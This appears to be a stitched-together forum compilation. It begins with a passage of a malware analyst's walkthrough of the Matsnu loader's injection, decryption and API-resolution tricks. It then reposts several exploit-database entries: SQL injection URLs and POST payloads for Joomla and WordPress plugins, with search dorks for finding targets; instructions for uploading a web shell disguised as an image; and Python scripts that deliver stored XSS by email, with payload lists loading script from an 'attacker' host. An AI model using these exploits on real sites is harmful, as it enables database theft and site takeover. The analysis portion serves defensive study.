suspended mode. 0040E808 56 PUSH ESI 0040E809 57 PUSH EDI 0040E80A 6A 00 PUSH 0 0040E80C 6A 00 PUSH 0 0040E80E 6A 04 PUSH 4 0040E810 6A 00 PUSH 0 0040E812 6A 00 PUSH 0 0040E814 6A 00 PUSH 0 0040E816 50 PUSH EAX 0040E817 6A 00 PUSH 0 0040E819 FF15 E4F14000 CALL kernel32.CreateProcessA Stack View: 0006FC6C 00000000 |ModuleFileName = NULL 0006FC70 00403DB9 |CommandLine = “svchost.exe” 0006FC74 00000000 |pProcessSecurity = NULL 0006FC78 00000000 |pThreadSecurity = NULL 0006FC7C 00000000 |InheritHandles = FALSE 0006FC80 00000004 |CreationFlags = CREATE_SUSPENDED 0006FC84 00000000 |pEnvironment = NULL 0006FC88 00000000 |CurrentDir = NULL 0006FC8C 0006FCA0 |pStartupInfo = 0006FCA0 0006FC90 0006FCE4 \pProcessInfo = 0006FCE4 As you can see, the author chooses to launch svchost.exe as child process that wouldn’t make a user suspect something through the process names from the task manager (or any other process enumeration tool). At this point we need to know the PID of the child process that is going to be created, which we can retrieve from the PROCESS_INFORMATION structure once the child process has been created. Because Windows is going to be more than one processes with the same name, we need to know which one was created by the loader of the malware in order to attach to that one later. A few lines later at address 0040E828 will CALL the function dedicated to the injection of the malicious thread. It will first allocate some extra memory on the child process, still in suspended mode. 0040E847 C745 F9 0000000 MOV DWORD PTR SS:[EBP-7], 0 0040E84E 6A 40 PUSH 40 0040E850 68 00301000 PUSH 103000 0040E855 68 D4D50000 PUSH 0D5D4 0040E85A 6A 00 PUSH 0 0040E85C FF75 08 PUSH DWORD PTR SS:[EBP+8] 0040E85F FF15 A8F14000 kernel32.VirtualAllocEx Then it will use the WriteProcessMemory API to inject the code into the allocated memory area inside the child thread. 0040E874 51 PUSH ECX 0040E875 68 D4D50000 PUSH 0D5D4 0040E87A 56 PUSH ESI 0040E87B FF75 E8 PUSH DWORD PTR SS:[EBP-18] 0040E87E FF75 08 PUSH DWORD PTR SS:[EBP+8] 0040E881 FF15 B4F14000 CALL kernel32.WriteProcessMemory Stack View: 0006FC54 00000038 |hProcess = 00000038 (window) 0006FC58 7FFA0000 |Address = 7FFA0000 0006FC5C 00401000 |Buffer = UPX_pack.00401000 0006FC60 0000D5D4 |BytesToWrite = D5D4 (54740.) 0006FC64 0006FC68 \pBytesWritten = 0006FC68 Method 1 – Injecting an Infinite Loop As you can see above, the address of the start of the buffer that is going to be copied to the child process is 00401000. So, at this point, and since we don’t want to miss the execution of the thread, we can go to the buffer and change (in this case) the first 2 bytes from 5589 to EBFE (which corresponds to a jump instruction that jumps back to itself). In this way, we create an infinite loop. Finally, the loader will start the injected thread, but remember, we had set an infinite loop at the beginning of it. 0040E88A 50 PUSH EAX 0040E88B 6A 00 PUSH 0 0040E88D 6A 00 PUSH 0 0040E88F FF75 E8 PUSH DWORD PTR SS:[EBP-18] 0040E892 6A 00 PUSH 0 0040E894 6A 00 PUSH 0 0040E896 FF75 08 PUSH DWORD PTR SS:[EBP+8] 0040E899 FF15 B8F14000 CALL kernel32.CreateRemoteThread Once this step is done, we can attach to the child process and analyse the injected thread which keeps looping over the first instruction. Then we cab go there and take control of it in order to restore the two original bytes. Method 2 – Modify EP & Memory Dump Another trick that we can use in this case is: to wait for the loader to copy the imports table (as seen previously during the explanation of the first method). But instead of letting the loader to copy the code starting from address 00401000 to the child process, we can set the entry point there, dump and fix the imports, as we normally do during manual unpacking practices. In this case, the technique is safe primarily because the code of the injected thread needs to be stand-alone in the context of the process address space in which it runs. In other words, since this piece of code it is injected inside the address space of another process cannot rely on the memory alignment of the other modules, their image base etc. So it is safe to set the entry point at address 00401000, once the imports are copied and just dump from there and save it as a new executable file. Conclusion The behaviour of the loader examined during this article is very similar to the most common loaders used by various types of malwares in nowadays, such as ransomware, fake AVs etc. Keep in mind that in most of the cases, the loader at some point will make use of at least one of the following three APIs: VirtualAlloc, VirtualAllocEx, or ZwAllocateVirtualMemory. So it is good practice to keep an eye on them and on the memory area(s) allocated through them. Original Article

The AV industry is growing every day along with the underground industry that produces all types of malware from simple file infectors to more sophisticated Trojan types that are able to gather and send sensitive information to the bad guys. The fight between AV companies and malware authors is getting bigger and bigger every single day. Both good and bad guys dedicate a lot of time to researching and implementing ways to detect and ways to avoid detection ( depending on which side these people are). Most of the malware research is usually concentrated on the infection mechanisms of the malware. Other points of focus include techniques used for the malware to communicate with its creator and completely surpassing the anti-virus evasion techniques used by the malware in the first place. This article aims to dig inside the loader used by the Matsnu malware family in order to deploy itself and avoid detection by AV products. Fortunately, at this point the variant is already detected by most AV vendors. In my job as a malware analyst, I very often hear this kind of AV evasion technique described as a “packer”. In a very abstract way, this might be true, but in a technical way, it really isn’t. From my experience with packers and manual unpacking, I expect that a packer will incorporate some compression algorithm and most probably an encryption algorithm (custom or not). Furthermore, the behaviour of a packer is usually a lot different. A packer will usually decompress and decrypt the code of the original executable and then will jump to its original entry point (OEP). On the other hand, I prefer calling these “packers” used by more and more malware authors as loaders. This is because of the technical details. These loaders will usually launch a child process in suspended mode, overwrite its memory with the decrypted code of the malware, and then resume its main thread. Some of them might then choose to allocate some extra memory on the child process instead of overwriting its memory and insert there the decrypted viral code. Additionally, this loader might then inject a thread to the child process with the starting address at the beginning of the allocated memory where the viral code is placed. Some others might overwrite themselves through a code stub written into an extra chunk of allocated memory and then jump back to the PE image address space. In addition, very often the malware authors will choose to first compress the original viral code using a common packer (such as UPX, PECompact etc.) and then encrypt it and incorporate it inside the loader. From a technical point of view, it is quite fair to distinguish these two types of mechanisms, and even if we keep calling them all “packers” for simplicity, it is necessary to understand the differences between them. The final goal of this article is to manage to isolate a fully working executable of the original malware under the various anti-AV protection layers. Self-Decryption Stage I A big part of the code of the loader will be decrypted on run-time through a “slow” decryption algorithm which does a lot of operations in each loop, decrypting the code dword by dword. The outer loop: 00401752 8B4D F0 MOV ECX, DWORD PTR SS:[EBP-10] 00401755 83C1 01 ADD ECX, 1 00401758 894D F0 MOV DWORD PTR SS:[EBP-10], ECX 0040175B 817D F0 688E0 CMP DWORD PTR SS:[EBP-10], 28E68 ß check counter 00401762 7D 5E JGE SHORT 004017C2 ß exit the loop once finished …more code here 0040178F E8 D7040000 CALL 00401C6B ß call to the decryption routine …more code here 004017C0 EB 90 JMP SHORT 00401752 ß jump up to loop start Inside the Decryption Routine: Some additional loops are taking place here, but the important instruction is the one that actually writes every time the result is a dword stored in ECX register to the memory location pointed by EAX register: 00401ED8 8908 MOV DWORD PTR DS:[EAX], ECX ß Initial value in EAX is 00408584, it is incremented by a dword in each iteration. Self-Decryption Stage II When the outer loop mentioned above has finished, there is another one taking place a few instructions later. 004017DE 8B4D E0 MOV ECX, DWORD PTR SS:[EBP-20] 004017E1 83C1 05 ADD ECX, 5 004017E4 894D E0 MOV DWORD PTR SS:[EBP-20], ECX 004017E7 817D E0 DF0C0 CMP DWORD PTR SS:[EBP-20], 0CDF ß check counter 004017EE 7D 77 JGE SHORT 00401867 ß exit the loop …more code here 00401862 E9 77FFFFFF JMP 004017DE ß jump up to loop start Self-Decryption Stage III There is one more loop coming next during the self-decryption stage. 0040187E BA 01000000 MOV EDX, 1 00401883 85D2 TEST EDX, EDX 00401885 0F84 D2000000 JE 0040195D The three instructions above create a fake execution flow redirection. In fact, since the value 1 is always passed to the EDX register, after performing the TEST instruction on the same register, the conditional JE jump that follows will never have any effect on the execution flow. 0040188B 817D F0 688E0 CMP DWORD PTR SS:[EBP-10], 28E68 ß check counter 00401892 0F85 A1000000 JNZ 00401939 ß if not equal jump to increase_counter Some more code is presented below: increase_counter: 00401939 8B4D F0 MOV ECX, DWORD PTR SS:[EBP-10] 0040193C 83C1 01 ADD ECX, 1 0040193F 894D F0 MOV DWORD PTR SS:[EBP-10], ECX enter_next_decryprion_routine: 00401942 68 F7480700 PUSH 748F7 00401947 68 18194F00 PUSH 4F1918 0040194C 8B55 F4 MOV EDX, DWORD PTR SS:[EBP-C] 0040194F 52 PUSH 00401950 E8 4A000000 CALL 0040199F ß call decryption routine 00401955 83C4 0C ADD ESP, 0C 00401958 E9 21FFFFFF JMP 0040187E ß jump to loop start Inside the Decryption Routine: Some more loops are taking place here, but the important instruction is the one that actually writes every time the result is a dword stored in ECX and registered to the memory location pointed by EAX register: 00401B70 8908 MOV DWORD PTR DS:[EAX], ECX ß Initial value in EAX is 00408584. It is incremented by a dword in each iteration. Self-Decryption Stage IV Going back to the loop outside the decryption function, we saw the condition which would normally signal the end of the looping process. It is fake, and we need to examine it more carefully in order to locate the next step. Indeed, when the conditions are correct, the execution will reach a CALL instruction: 0040191D E8 8FF8FFFF CALL 004011B1 The CALL to the beginning of the previously encrypted code is located inside this function : 004013B6 FF15 108B4000 CALL NEAR DWORD PTR DS:[408B10] ß value stored in this address is 00408584 Once we enter the function at address 00408584 we see the following: 00408584 E8 07000000 CALL 00408590 00408589 75 3A JNZ SHORT 004085C5 Note the obfuscation trick in the first instruction that confuses the disassembling engine. In fact, the CALL instruction will bring the execution in the end of the instruction starting at address 0040858B, which means that all those bytes in between are junk bytes in this case. 0040858B 03A0 21D64F5B ADD ESP, DWORD PTR DS:[EAX+5B4FD621] 00408591 81EB 05103A00 SUB EBX, 3A1005 00408597 8DB3 2E103A00 LEA ESI, DWORD PTR DS:[EBX+3A102E] 0040859D B9 8B020000 MOV ECX, 28B 004085A2 66BF 7592 MOV DI, 9275 004085A6 66313E XOR WORD PTR DS:[ESI], DI 004085A9 6683C7 02 ADD DI, 2 004085AD 83C6 02 ADD ESI, 2 004085B0 E2 F4 LOOPD SHORT 004085A6 004085B2 FC CLD 004085B3 7E 2A JLE SHORT 004085DF 004085B5 1B95 CFF6215C SBB EDX, DWORD PTR SS:[EBP+5C21F6CF] 004085BB 8745 92 XCHG DWORD PTR SS:[EBP-6E], EAX 004085BE D7 XLAT BYTE PTR DS:[EBX+AL] 004085BF 1F POP DS 004085C0 30D5 XOR CH, DL 004085C2 94 XCHG EAX, ESP This is what we see once we execute the CALL instruction: 00408590 5B POP EBX 00408591 81EB 05103A00 SUB EBX, 3A1005 00408597 8DB3 2E103A00 LEA ESI, DWORD PTR DS:[EBX+3A102E] ß starts from address 004085B2 0040859D B9 8B020000 MOV ECX, 28B ß loop counter 004085A2 66BF 7592 MOV DI, 9275 ß decryption key 004085A6 66313E XOR WORD PTR DS:[ESI], DI ß decrypt by XORing with 9275, one word in each iteration. 004085A9 6683C7 02 ADD DI, 2 004085AD 83C6 02 ADD ESI, 2 004085B0 E2 F4 LOOPD SHORT 004085A6 The above decryption algorithm will decrypt an extra portion of code starting from the instruction located immediately after the LOOPD. So, at this point we saw the various steps used by this loader to decrypt the next parts of the code. Now it’s time to continue with the rest of its mechanisms. Dynamic Imports Resolving & PEB Loader Data Structure Normally, malware authors retrieve the VAs of the APIs by using two Windows APIs, which are the LoadLibrary and the GetProcAddress APIs. These are employed in order to avoid detection through the imports normally listed inside the imports table. However, in this case the author of the loader has decided to go through the PEB (Process Environment Block) Loader Data Structure – PEB_LDR_DATA structure in order to retrieve the necessary information, which is a more stealth way to retrieve the VAs of the necessary APIs. The pointer to this structure is located at PEB + 0x0C. Back to where we stopped, immediately after the end of the decryption loop we locate a CALL at address 004085CD and by entering this function we see another CALL at address 004086EF, and inside that function is where the loader of the malware will access the PEB_LDR_DATA structure. 0040870E 64FF35 3000000 PUSH DWORD PTR FS:[30] 00408715 58 POP EAX In the two instructions above, we notice another obfuscation attempt. In fact, instead of pushing the address of PEB onto the stack and then popping that value back to EAX, we could just do MOV EAX, DWORD PTR FS:[30]. 00408716 8B40 0C MOV EAX, DWORD PTR DS:[EAX+C] ß move to EAX the pointer to the PEB_LDR_DATA 00408719 8B48 0C MOV ECX, DWORD PTR DS:[EAX+C] ß mov to ECX the pointer to the first LDR_MODULE structure of the first module loaded by the windows loader 0040871C 8B11 MOV EDX, DWORD PTR DS:[ECX] ß save to EDX the pointer to the LDR_MODULE structure of the next module loaded by the windows loader 0040871E 8B41 30 MOV EAX, DWORD PTR DS:[ECX+30] ß mov to EAX the pointer to the name of the first module name loaded by the windows loader. Then follow another CALL at address 00408728, to a function dedicated to calculate a magic dword from the name of the currently examined module. If the dword matches the predefined constant, then the loader knows it found the necessary loaded module to continue its mechanisms. Calculation Algorithm: 00408797 8A10 MOV DL, BYTE PTR DS:[EAX] ß go through all chars one by one 00408799 80CA 60 OR DL, 60 ß start dword calculation 0040879C 01D3 ADD EBX, EDX 0040879E D1E3 SHL EBX, 1 ß end dword calculation 004087A0 0345 10 ADD EAX, DWORD PTR SS:[EBP+10] ß increase pointer to string name by 2, because it’s stored as Unicode 004087A3 8A08 MOV CL, BYTE PTR DS:[EAX] ß mov next char value to CL 004087A5 84C9 TEST CL, CL ß check if it’s zero, which means we reached the end of the string 004087A7 E0 EE LOOPDNE SHORT 00408797 ß if it’s not jump up to loop for the next char 004087A9 31C0 XOR EAX, EAX ß zero out EAX 004087AB 8B4D 0C MOV ECX, DWORD PTR SS:[EBP+C] ß move to ECX magic dword 004087AE 39CB CMP EBX, ECX ß check if calculated dword = magic dword 004087B0 74 01 JE SHORT 004087B3 ß if it is, module located 004087B2 40 INC EAX 004087B3 5A POP EDX 004087B4 5B POP EBX 004087B5 59 POP ECX 004087B6 89EC MOV ESP, EBP 004087B8 5D POP EBP 004087B9 C2 0C00 RET 0C The figure that follows demonstrates the condition in which the two values matchwhen checking the kernel32.dll loaded module. Once the necessary module is located, we will reach the next part of the code that will attempt to find the VAs of specific exported functions from the kernel32.dll after exiting from the previous function. 00408735 8B41 18 MOV EAX, DWORD PTR DS:[ECX+18] ß get the image base of kernel32.dll from LDR_MODULE structure 00408738 50 PUSH EAX 00408739 8B58 3C MOV EBX, DWORD PTR DS:[EAX+3C] ß get the offset of its PE Header 0040873C 01D8 ADD EAX, EBX 0040873E 8B58 78 MOV EBX, DWORD PTR DS:[EAX+78] ß get the RVA of its Export Table Once the loader of the malware locates the export table of the kernerl32.dll will use it in order to retrieve the VAs of few APIs, four in total, necessary to proceed. Here is the table that is created at this stage: 00408AA5 760CBC8B kernel32.LoadLibraryExA 00408AA9 760D05F4 kernel32.VirtualAlloc 00408AAD 760C50AB kernel32.VirtualProtect 00408AB1 760D1837 kernel32.GetProcAddress In the next instalment, I will begin by showing how to Locate and Isolate the Embedded Decrypted Executable. Have fun! Original Article

Joomla FireBoard Component (com_fireboard) SQL Injection Vulnerability [table=width: 500, class: grid] [tr] [td]EDB-ID: 20390[/td] [td]CVE: N/A[/td] [td]OSVDB-ID: N/A[/td] [/tr] [tr] [td]Author: Vulnerability-Lab[/td] [td]Published: 2012-08-09[/td] [td]Verified: [/td] [/tr] [tr] [td]Exploit Code: [/td] [td]Vulnerable App: N/A[/td] [td][/td] [/tr] [/table] Title: ====== Joomla com_fireboard - SQL Injection Vulnerability Date: ===== 2012-07-11 References: =========== http://www.vulnerability-lab.com/get_content.php?id=655 VL-ID: ===== 655 Common Vulnerability Scoring System: ==================================== 7.3 Introduction: ============= Joomla is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets and a model–view–controller (MVC) Web application framework that can also be used independently. Joomla is written in PHP, uses object-oriented programming (OOP) techniques and software design patterns, stores data in a MySQL database, and includes features such as page caching, RSS feeds, printable versions of pages, news flashes, blogs, polls, search, and support for language internationalization. Joomla had been downloaded 23 million times. Between March 2007 and February 2011 there had been more than 21 million downloads. As of November 2011, there are over 8,600 free and commercial extensions available from the official Joomla! Extension Directory and more available from other sources. (Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/Joomla) Abstract: ========= The Laboratory Researcher (Nafsh) Ehram Shahmohamadi (sec-lab.ir) discovered a SQL Injection Vulnerability in the com_fireboard module of the joomla CMS. Report-Timeline: ================ 2012-07-11: Public or Non-Public Disclosure Status: ======== Published Exploitation-Technique: ======================= Remote Severity: ========= High Details: ======== A SQL Injection vulnerability is detected in the com_fireboard module of the joomla Content Management System. Remote attackers & low privileged user accounts can execute/inject own sql commands to compromise the application dbms. The vulnerability is located in the com_fireboard module with the bound vulnerable func fb_ parameter. Successful exploitation of the vulnerability result in dbms (Server) or application (Web) compromise. Vulnerable Module(s): [+] index.php?option=com_fireboard Vulnerable Parameter(s): [+] func fb_ Proof of Concept: ================= The sql injection vulnerability can be exploited by remote attackers without user inter action & with low privileged user account. For demonstration or reproduce ... Dork(s): inurl:"id=" & intext:"/com_fireboard/" PoC: http://[TARGET]/index.php?option=com_fireboard&Itemid=0&id=1&catid=0&func=fb_pdf'[SQL-INJECTION] Reference(s): xxx.com/index.php?option=com_fireboard&Itemid=0&id=1&catid=5&func=fb_pdf'[SQL-INJECTION] xxx.com/2012/index.php?option=com_fireboard&Itemid=79&id=1&catid=2&func=fb_pdf'[SQL-INJECTION] xxx.com/fireboard/index.php?option=com_fireboard&Itemid=38&id=22111&catid=16&func=fb_pdf'[SQL-INJECTION] xxx.com/board/index.php?option=com_fireboard&Itemid=54&id=70122&catid=12&func=fb_pdf'[SQL-INJECTION] xxx.com/jmfireboard/index.php?option=com_fireboard&Itemid=54&id=70122&catid=12&func=fb_pdf'[SQL-INJECTION] Risk: ===== The security risk of the remote sql injection vulnerability is estimated as high(+). Credits: ======== Nafsh - Ehram Shahmohamadi - (research@sec-lab.ir) [www.sec-lab.ir] - TEAM K0242 Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: research@vulnerability-lab.com Sursa

Joomla joomgalaxy 1.2.0.4 Multiple Vulnerabilities [table=width: 500, class: grid] [tr] [td]EDB-ID: 20197[/td] [td]CVE: N/A[/td] [td]OSVDB-ID: N/A[/td] [/tr] [tr] [td]Author: D4NB4R[/td] [td]Published: 2012-08-02[/td] [td]Verified: [/td] [/tr] [tr] [td]Exploit Code: [/td] [td]Vulnerable App: N/A[/td] [td][/td] [/tr] [/table] _______________________________________________________________________________________ Exploit Title: Joomla joomgalaxy 1.2.0.4 Multiple Vulnerabilites dork: inurl:com_joomgalaxy Date: [01-08-2012] Author: Daniel Barragan "D4NB4R" Twitter: @D4NB4R site: http://poisonsecurity.wordpress.com/ Vendor: http://www.joomgalaxy.com/ Version: 1.2.0.4 (last update on Jul 27, 2012) License: Commercial $ 149 us Demo: http://joomgalaxy.com/demo/ Tested on: [Linux(bt5)-Windows(7ultimate)] Joomgalaxy is a rich, comprehensive directory component brimming with unique features like Entry comparison, Pay per download, Tagging, Email Cloaking, Review and Rating with Multiple Attributes, add Articles to Entries, with many more plus all standard directory features as well. 1. Unrestricted File Upload 1a. Go to this route, Complete the form and login the site Ingrese a esta ruta, Complete el formulario e ingrese al sitio http://site/index.php?option=com_users&view=registration 1b. go to the following link and create a new post (sometimes it ask for confirmation of an administrator) so then create the post with something of social engineering and wait for a confirmation, if not forget this step vaya a este enlace cree un nuevo anuncio "Algunas veces pide confirmacion de administrador" asi que cree el anuncio con algo de ingenieria social y espere que confirmen si no omita este paso http://site/index.php?option=com_joomgalaxy&view=addentry 1c. once the post is published go to the tab images and upload your shell in the following way: shell.php.jpg Una vez resgistrado el anuncio dirijase a la pestaña imagenes y suba su shell de la siguiente forma shell.php.jpg 1d. Find your shell in the path Busque su shell en este path http://site/administrator/components/com_joomgalaxy/assets/images/Image_gallery/randomid_shell.php.jpg 2. Sql Injection p0c: http://site/index.php?option=com_joomgalaxy&view=categorylist&type=thumbnail?=en&catid=100000001-100000001=0 union (select 1,database(),3,4,5,6,7,8,9,10,11,12,13) Gretz : devboot, P1l0tcast, ksha, dedalo, etc.. Im not responsible for which is given No me hago responsable del uso que se le de _______________________________________________________________________________________ Daniel Barragan "D4NB4R" 2012 Sursa

WordPress Mz-jajak plugin <= 2.1 SQL Injection Vulnerability [table=width: 500, class: grid] [tr] [td]EDB-ID: 20416[/td] [td]CVE: N/A[/td] [td]OSVDB-ID: N/A[/td] [/tr] [tr] [td]Author: StRoNiX[/td] [td]Published: 2012-08-10[/td] [td]Verified: [/td] [/tr] [tr] [td]Exploit Code: [/td] [td]Vulnerable App: [/td] [td][/td] [/tr] [/table] # Exploit Title: WordPress Mz-jajak plugin <= 2.1 SQL Injection Vulnerability # Date: 2012-08-10 # Author: StRoNiX # E-mail: hacker@hotmail.rs # Software Link: http://downloads.wordpress.org/plugin/mz-jajak.zip # Version: 2.1 (tested) --------------- PoC (POST data) --------------- POST /index.php HTTP/1.1 User-Agent: Mozilla Host: example.com Accept: */* Referer: http://example.com/?page_id=9 Connection: Keep-Alive Content-Length: 111 Content-Type: application/x-www-form-urlencoded answer=1&formvote=Y&id=1 AND 1=0 UNION ALL SELECT 1,2,version(),user(),5,6,7,8,9,10,11,12,13,14,15--+&x=10&y=12 --------------- Vulnerable code --------------- $id=$_POST['id']; ... $query = $wpdb->query("UPDATE " . $table_name . " SET ".$answert."=".$answert."+1 WHERE id=".$id); } $rows = $wpdb->get_results("SELECT * FROM " . $table_name . " WHERE id=".$id); ########################################################### Greetz: T0r3x, m1l05, JuMp-Er, EsC, UNICORN, Xermes, s4r4d0 ----------------------------snip-------------------------------------- Thanks, ~StRoNiX Sursa

Wordpress SimpleMail Plugin 1.0.6 Stored XSS [table=width: 500, class: grid] [tr] [td]EDB-ID: 20361[/td] [td]CVE: 2012-2579[/td] [td]OSVDB-ID: N/A[/td] [/tr] [tr] [td]Author: loneferret[/td] [td]Published: 2012-08-08[/td] [td]Verified: [/td] [/tr] [tr] [td]Exploit Code: [/td] [td]Vulnerable App: [/td] [td][/td] [/tr] [/table] #!/usr/bin/python ''' Author: loneferret of Offensive Security Product: SimpleMail Version: 1.0.6 (free version) Vendor Site: http://codecanyon.net/item/wp-simplemail/1130008?ref=tinsley Software Download: http://wordpress.org/extend/plugins/wp-simplemail/ Timeline: 29 May 2012: Vulnerability reported to CERT 30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012 23 Jul 2012: Update from CERT: No response from vendor 08 Aug 2012: Public Disclosure Installed On: Ubuntu LAMP 8.04 Wordpress: 3.3.1 Client Test OS: MAC OS Lion Browser Used: Firefox 12 Injection Points: To, From, Date, Subject Injection Payload(s): 1: ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{} 2: <SCRIPT>alert('XSS')</SCRIPT> 3: <SCRIPT SRC=http://attacker/xss.js></SCRIPT> 4: <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> 5: <IFRAME SRC="javascript:alert('XSS');"></IFRAME> 6: <SCRIPT SRC="http://attacker/xss.jpg"></SCRIPT> 7: </TITLE><SCRIPT>alert("XSS");</SCRIPT> 8: <SCRIPT SRC=//attacker/.j> 9: <<SCRIPT>alert("XSS");//<</SCRIPT> 10: <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> 11: <SCRIPT a=">" SRC="http://attacker/xss.js"></SCRIPT> 12: <SCRIPT ="blah" SRC="http://attacker/xss.js"></SCRIPT> 13: <SCRIPT a="blah" '' SRC="http://attacker/xss.js"></SCRIPT> 14: <SCRIPT "a='>'" SRC="http://attacker/xss.js"></SCRIPT> 15: <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://attacker/xss.js"></SCRIPT> 16: <SCRIPT a=">'>" SRC="http://attacker/xss.js"></SCRIPT> ''' import smtplib, urllib2 payload = """<SCRIPT>alert('XSS')</SCRIPT>""" def sendMail(dstemail, frmemail, smtpsrv, username, password): msg = "From: hacker@offsec.local" + payload + "\n" msg += "To: victim@victim.local\n" msg += 'Date: Today\r\n' msg += "Subject: Offensive Security\n" msg += "Content-type: text/html\n\n" msg += "XSS\r\n\r\n" server = smtplib.SMTP(smtpsrv) server.login(username,password) try: server.sendmail(frmemail, dstemail, msg) except Exception, e: print "[-] Failed to send email:" print "[*] " + str(e) server.quit() username = "hacker@offsec.local" password = "123456" dstemail = "victim@victim.local" frmemail = "hacker@offsec.local" smtpsrv = "172.16.84.171" print "[*] Sending Email" sendMail(dstemail, frmemail, smtpsrv, username, password) Sursa

MailTraq 2.17.3.3150 Stored XSS [table=width: 500, class: grid] [tr] [td]EDB-ID: 20358[/td] [td]CVE: 2012-2586[/td] [td]OSVDB-ID: N/A[/td] [/tr] [tr] [td]Author: loneferret[/td] [td]Published: 2012-08-08[/td] [td]Verified: [/td] [/tr] [tr] [td]Exploit Code: [/td] [td]Vulnerable App: N/A[/td] [td][/td] [/tr] [/table] #!/usr/bin/python ''' Author: loneferret of Offensive Security Product: MailTraq Version: 2.17.3.3150(Mar 5th, 2012) Vendor Site: http://www.mailtraq.com/ Software Download: http://www.mailtraq.com/30day Timeline: 29 May 2012: Vulnerability reported to CERT 30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012 23 Jul 2012: Update from CERT: No response from vendor 08 Aug 2012: Public Disclosure Installed On: Windows Server 2003 SP2 Client Test OS: Window 7 Pro SP1 (x86) Browser Used: Internet Explorer 9 Injection Point: Subject Injection Payload(s): 1: ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{} 2: <!--[if gte IE 4]> <SCRIPT>alert('XSS');</SCRIPT> <![endif]-- 3: </TITLE><SCRIPT>alert("XSS");</SCRIPT> Injection Point: Body Injection Payload(s): 1: <IFRAME SRC="javascript:alert('XSS');"></IFRAME> 2: <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> 3: <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> Injection Point: Date Injection Payload(s): 1: ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{} 2: <SCRIPT>alert('XSS')</SCRIPT> 3: <SCRIPT SRC=http://attacker/xss.js></SCRIPT> 4: <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> 5: <DIV STYLE="width: expression(alert('XSS'));"> 6: <IFRAME SRC="javascript:alert('XSS');"></IFRAME> 7: <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> 8: <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> 9: <XSS STYLE="xss:expression(alert('XSS'))"> 10: <!--[if gte IE 4]> <SCRIPT>alert('XSS');</SCRIPT> <![endif]-- 11: <SCRIPT SRC="http://attacker/xss.jpg"></SCRIPT> 12: </TITLE><SCRIPT>alert("XSS");</SCRIPT> 13: <SCRIPT/XSS SRC="http://attacker/xss.js"></SCRIPT> 14: <SCRIPT SRC=//attacker/.j> 15: <<SCRIPT>alert("XSS");//<</SCRIPT> 16: <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> 17: <SCRIPT a=">" SRC="http://attacker/xss.js"></SCRIPT> 18: <SCRIPT ="blah" SRC="http://attacker/xss.js"></SCRIPT> 19: <SCRIPT a="blah" '' SRC="http://attacker/xss.js"></SCRIPT> 20: <SCRIPT "a='>'" SRC="http://attacker/xss.js"></SCRIPT> 21: <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://attacker/xss.js"></SCRIPT> 22: <SCRIPT a=">'>" SRC="http://attacker/xss.js"></SCRIPT> ''' import smtplib, urllib2 payload = """</TITLE><SCRIPT>alert("XSS");</SCRIPT>""" def sendMail(dstemail, frmemail, smtpsrv, username, password): msg = "From: hacker@offsec.local\n" msg += "To: victim@victim.local\n" msg += 'Date: Today\r\n' msg += "Subject: XSS" + payload + "\n" msg += "Content-type: text/html\n\n" msg += "XSS.\r\n\r\n" server = smtplib.SMTP(smtpsrv) server.login(username,password) try: server.sendmail(frmemail, dstemail, msg) except Exception, e: print "[-] Failed to send email:" print "[*] " + str(e) server.quit() username = "hacker@offsec.local" password = "123456" dstemail = "victim@victim.local" frmemail = "hacker@offsec.local" smtpsrv = "172.16.84.171" print "[*] Sending Email" 